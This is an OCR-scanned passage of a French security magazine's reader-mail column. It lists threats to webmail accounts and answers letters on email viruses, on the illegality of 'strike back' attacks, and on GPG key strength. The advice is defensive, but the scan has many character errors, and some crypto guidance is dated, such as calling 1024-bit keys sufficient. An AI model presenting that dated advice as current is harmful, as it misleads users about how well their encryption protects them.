Menaces principales : 


- brute force du mot de passo, 
- découverte de la réponse à la " question " de récupération du mot de passe, 

- faille quelconque du serveur mail permettant une intrusion, 

- faille XSS du webmail permettant de récupérer un cookie de session (voir THJ 13, par exemple), 

- soclal engineering (faux formulaire...) facilité par les failles d'iE (par exemple au niveau de l'affichage de l'adresse URL, voir THJ 14), 
- sniffing de session POPS ou http. 


Curieux messages 


Bonjour, 

J'ai constaté une bizarre sur mes différentes boîtes mail depuis quelque temps, provenart d'adresses mall variées et tout à fait cohérentes. Je reçois à 
À peu piès le même type de message, une phrase en anglais me disant de Ile le fichier attaché, qui s'appelle presque toujours " your_file.pif", 

1 ma semble qu'il y a là un virus, mais Je vous mets au courant narce que les possesseurs de ces adresses mail ne semblent pas au courant de ces 
ETNOÏS... 


Christophe 
Voilà, je vous souhaîte une borne journée ! 


On regoit en effet de plus en plus ce genie de messages. Il s'agit bion de virus, qui se propagent par los messageries électroniques, 
profitant le plus souvent de failles dans Outlook/IE. Les fournisseurs d'accès sérieux devraient filtrer ces messages à la réception, 
avant de les transmettre à leurs clients. Cependant, c'est rarement le cas : à croire que la sécurité des abonnés n'est pas toujours 
une priorité (pas plus que les économies de bande passante 1). 

Pourtant, comme tu le dis, ces messages se ressemblent beaucoup. Il est ainsi facile d'en filtrer une grande majorité, avec des règles 
simples. C'est possible avec un antivirus mis à jour régulièrement, ou même avec un filtre anti spam. 

Il faut bien préciser aussi que l'adresse expéditeur de ces mails vérolés est presque toujouts falsifiée. l'est donc inutile de prévenir 
la personne qui semble vous l'avoir envoyé. Ces virus sont capables d'extraire les emails du camet d'adresse de la victime, des mes- 
sages reçus et envoyé, et parfois de certains fichiers présents sur le disque dur, En théorie, l'adiesse réelle de la personne infectée 
n'est donc que rarement utilisée. 

Encore une fois, il ne faut jamais cliquer aveuglément sur un fichier attaché, que ce soit sur Outlook, un autre client mail ou même 
un webmail, même si vous connaissez l'expéditeur. La marche à suivre est soit de demander confirmation, soit de sauver le fichier 
sur le bureau et de l'ouvrir, avec le menu Fichier, depuis l'application concernée (visionneur d'images, de pof, de texte, etc. atten- 
tion aux fichiers MS Word et Excel, qui peuvent contenir des macro-virus). 


Strike back 


Salut, 

Juste paur te demander un truc si tu as le temps :) 

En fait j'aimerais savoir s| c'est possible d'empêcher quelqu'un de se connecter sur un de ses ports de la manière suivante : 5’ tente de se connecter sur 
ma machine, sa machine plante ou chope un virus ou etc. 

Et par quels moyens si c'est possible ? 


À Merid'aance 


Ça s'appelle le " strike back " c'est possible s'il est vulnérable à certaines failles, mais c'est une très mauvaise id 
1) c'est illégal, 
| 2) il y a de grandes chances pour que l'ordinateur qui t'attaque ne soit qu'un relais, c'est-à-dire une machine innocente qui s'est faite 
pirater. 


La bonne procédure serait plutôt d'envoyer un email automatique sur l'adresse abuse@ de son FAI, en faisant une requête whois sur 
son adresse IP. 
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ÿ c 
Cryptographie publique 
Lecteur régulier de vos ouvrages (Journal, Manuel, MiniPratik), j'essaie parfois de mettie en pretique vos conseils ou suggestions. 


C'est ainsi que j'utilse depuis quelques mois WindowsPrivacÿTools et GPG pour chifier et cader les malls que J'emole à un ami (1 faut bien commencer 
evec quelqu'un :-) et les volontaires pour faire un "effort * dans le domaine de la sécurité ne sont pas nombreux). Or j'ai eu une conversation hier au sujet 
d'un reportage d'Envoyé Spécial (que je n'ai pas vu. mea culpa) concerant un centie, en France, chargé de * décrypier "les messages (mal, télépho- 
ne) contenant des infos potentiellement dangereuses. Or la personne qui m'a " raconté * ce reportage me disait que les gens travaillant dans ce centre - 
et disposant, sol dit au passage, de moyens considérables - " cassalent * les codes en moins de temps qu'il n'en faut pour le dire. 


Je ne suis pas naïf, et je suis conscient qu'en informatique rien n'est impossible. Pourtant, à la lecture des articles du dernier manuel (N° 8) notamment, 
je ne sais plus vraiment quoi penser car vous semblez indiquer que les codes (GPG ?) sont encore assez fiables en terme de résistance au décryptage. 
Je n'ai absolument rien à cacher dans les correspondances que je peux avoir sur Internet, Mais, outre le fait de touver cela " sympa ‘de coder mes mails, 
il me sembie quand même hormal que " tout le monde * n'ai pas accès à ces messages. D'où l'intérêt que je voyais à crypter les mails. Mais si tout le 
monde peut y avoir accès... 

Bon je m'égare un peu, j'en reviens à la question qui m'interroge : quel crédit peut-on accarder au type de cryptage que j'utilise (basic, j'en suis sûr..), et 
dans le pire * des cas (pour mol) combien de temps 

cs codes peuvent résister aux meilleurs attaques actuelles ? Autrement dit, quels moyens (en termes de temps, d'argent …) doivent être mis en œuvre 
pour casser ces codes RSA, DSA, ELG 7 


Bon, |! est peut-être un peu tard et je ne suis plus tiès clair dans me propos. Je vous souhaite quand même encore de nombreuses et intéressantes publi- 
cations et surtout Liberté, Fraternité, Inteligence ". 


Il est difficile de savoir exactement quels sont les moyens de l'État. Et je n'ai pas l'intention de me lancer dans ce genre de spécu- 
lations ;> 

Mais une chose est sûre : les moyens d'un particulier sont à côté négligeables, même ceux d'un script kiddie qui contrôle une cen- 
taine de zombies. || est raisonnable de penser que décoder un message standard (par exemple crypté avec GPG) reste difficile et 
sans doute coûteux, même pour un organisme gouvernemental, qui doit donc avoir de bonnes raisons pour le faire. Et Il est certain 
que cela reste inaccessible au commun des mortels. 

En cryptographie, la règle est d'utiliser des sécurités proportionnelles aux besoins de confidentialité. Pour un particulier qui désire 
simplement protéger sa vie privée, une clé de 1024 bits est à mon avis largement suffisante. Une entroprise, par contre, qui veut 
préserver la confidentialité d'enjeux stratégiques à long terme, par exemple, devrait plutôt songer à utiliser des clés deux fois plus 
longues. Comme c'est un bon indicateur, on peut considérer le record public (RSA Factoring Challenge, rsasecurity.com) de factori- 
sation d'une clé asymétrique, qui est de 576 bits. 

Les algorithmes proposés par défaut par GPG (DSA pour les signatures et ElGamal pour le chiffrement) sont conselllés. 

La clé n'est cependant pas la seule faiblesse exploitable. Des attaques cryptographiques peuvent aussi tirer profit de messages oryp- 
tés qui auraient été interceptés. Vu que le volume de texte chiffré nécessaire est important, cela ne constitue pas une menace réel 
le. Mais il est pourtant conseillé de renouveler ses clés régulièrement (par exemple tous les ans), afin de limiter ces risques et 
minimiser l'impact d'un vol de clé, dont on ne se serait pas tout de suite aperçu. D'un point de vue réaliste, l'attaque la plus proba- 
ble que l'on puisse redouter est d'allleurs de se faire voler sa clé privée et son mot de passe (intrusion dans un ordinateur person- 
nel et installation d'un keylogger, par exemple). 


Il est bon de noter, enfin, que la cryptographie est réglementée en France, D'après le site hüp//wmssigouvit/, Il semble que 


la signature électronique soit libre d'utilisation, et le chiffrement autorisé (du moins avec certains logiciels, dont GnuPG : 
hitp://wuv.ssi.gouv.t/#/reglementaton/lste_cat/f18.htmi). Nos lecteurs juristes sauront apprécier la subtile différence. 
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